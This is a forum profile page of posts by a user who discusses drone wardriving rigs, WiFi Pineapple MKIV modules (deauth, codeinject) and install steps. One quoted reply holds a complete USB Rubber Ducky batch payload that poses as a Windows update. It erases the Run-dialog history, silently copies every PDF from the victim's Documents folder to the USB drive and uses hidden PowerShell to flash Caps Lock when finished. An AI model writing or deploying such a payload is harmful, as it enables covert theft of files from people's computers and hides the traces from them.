Jump to content

kerravon

Active Members
  • Posts

    250
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by kerravon

  1. 17 hours ago, b0N3z said:

    So I have cloned this hoover.pl to my pi and kali. everytime I run it I always get an error say " no tshark tool found" . I initially thought it was just the pi but it does the same on kali.  any ideas?

    check you have tshark installed if it is (should be on kali) try copying it to the same directory as hoover.pl see if that works.
    meantime I will set it up myself and see if I get the same error, and find whats causing it.

  2. On 18/12/2016 at 3:28 AM, b0N3z said:

    That looks like what I want.  Thank you.  Have you tryed it on a pizero?  If not ill let you know how it works when I get around to it.

    No havent tried it , I'm working on the wr703 and mr3040 as thay have a small footprint with everything i need built on board. but the pi zero would be an ideal plafform for a pocket wardriving device.

  3. 8 hours ago, kdodge said:

    I think someone else here has mentioned the ESP8266-12Es which is ideal for what your doing. its like an arduino w/ wifi. lightweight. easy to attach gps. low power req. cheap. easy to hack.

    thanks for the info I will look into that

  4. Hi all,
    I am looking at using a small wifi router like the wr307 or mr3020 with openwrt + battery supply and a gps dongle.
    then setting it up so it will log all ssids and gps loctaions to a thumbdrive when flying round ny desired target area.

    I know this has been fone with the wifi pineapple, but do I really want to risk losing it if it falls off, my idea is to use the above
    and fitting it inside of the drone casing as the circuit boards for these is quite small. If anyone has any ideas or thoughts
    I'd be happy to hear them.
     

  5. 1 hour ago, Cribbit said:

    Hi, I have not flashed my ducky so have not tested the code, but it looks like it's all there.

    e.cmd

    
    @echo off
    @echo Installing Windows Update
    
    REM Delete registry keys storing Run dislog history
    REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
    
    REM Creates directory compromised of computer name, date and time
    REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
    set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-7,2%%date:~-10,2%_%time:~0,2%%time:~3,2%%time:~6,2%
    mkdir %dst% >> nul
    
    if Exist %USERPROFILE%\Documents (
    REM /C Continues copuing even if errors occur.
    REM /Q Does not display file names while copying.
    REM /G Allows the copying of encrypted file to destination that does not support encryption.
    REM /Y Suppresses prompting to confrim you want to overwrite an existing destination file
    REM /S Copies directories and subdirectories except empty ones.
    REM /E Copies directories and subdirectories. Including empty ones.
    
    REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >> nul
    
    REM Same as above but does not create empty directories
    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >> nul
    )
    
    start /b /wait powershell.exe -nologo -WindowsStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');"

    I was playing around with the %time% a little so you may want to change them back

    cheers mate your a superstar

  6. 14 hours ago, Foxtrot said:

    Hi All just updated the descriptions on the ver 3.x infusions thanks to foxtrot, still need a couple more. Have also noticed we are
    a couple of infusions short to complete the set.  Doses any one have any of the following infusions :-

    deauth 1.2 whistlemaster  
    nmap 1.2 whistlemaster  
    networktools 1.3 computerchris
    wifiscript 1.0 leg3nd
    codeinject 1.1 leg3nd

    as always happy hacking guys!!!
     

  7. 19 hours ago, biomekanika said:

    @kerravon I highly appreciate you doing this - keeping the MK IV alive. Up to this day, it is still a vary capable piece of hardware. You sir, rock.

    Can't wait for the 3.0 infusions, and then some. :)

    Thanks mate, I like you love the MKIV and with the pineapple project I hope to not only keep it alive but possibly create updates etc.
    I will be looking at puting the v3.0 modules on over the weekend, but I have to archive each module individually at the moment before putting them up.  Dont forget if you have any ideas or articles you want to publish , be my guest.

    regards
    kerravon

     

  8. On 29/11/2016 at 0:06 AM, Kraethor said:

    So far, to install the 2.8.1 infusions, I have put together the following steps from this site.  Obviously, there is more to each step, I am just looking to get a complete list in one place.

    This seemed to work for my testing - at least so far for the infusions I have tried.  (I did see space issues, so I may have missed something for installing onto the USB instead of internal) 

     

    Step 1: Factory Reset (At least for me, as who knows what I did to screw it up prior.)

    Step 2: Setup a USB drive to contain the infusions and a swap partition

    Step 3: Download infusions and place the folders onto the USB drive

    Step 4: Configure fstab to utilize the USB drive

    Step 5: Edit /pineapple/infusions/moduleList to include the newinfusions

    Step 6: Link the infusions directory ( ln -s /usb/infusions/ /pineapple/infusions/usbInfusions)

    Step 7: Update opkg.conf to use  http://cloud.wifipineapple.com/mk5/packages

    Step 8: Reboot

    Step 9: In the Pineapple Bar, Install the new infusions.

     

    Can anyone add to this, at least in general?  As I said, this is a quick list with the details cutout for brevity.  

     

     

     

    Seems right, if you complete the instruction set you can publish it on the pineapple-project website if you wish.

  9. Hi all,
    Found a bit of breathing room yesterday and today, so I have put up the pineapple project website which will hold all the MKIV
    infusions for you to download, please give me a couple of day to put it together.  I will also put up all the mkIV tutorials I can find.

    Contributions to the site are most welcome and infact encouraged, I would like to make it a community built site if thats possible.
    The frontpage is up at http://www.pineapple-project.96.lt/

    and I hope to have the links for the  2.8.1 and 3.0 infusions up as I said in a couple of days.  Thank you to all you guys for your support
     and Darren and Seb for this wonderful little device.

    regrds
    kerravon

×
×
  • Create New...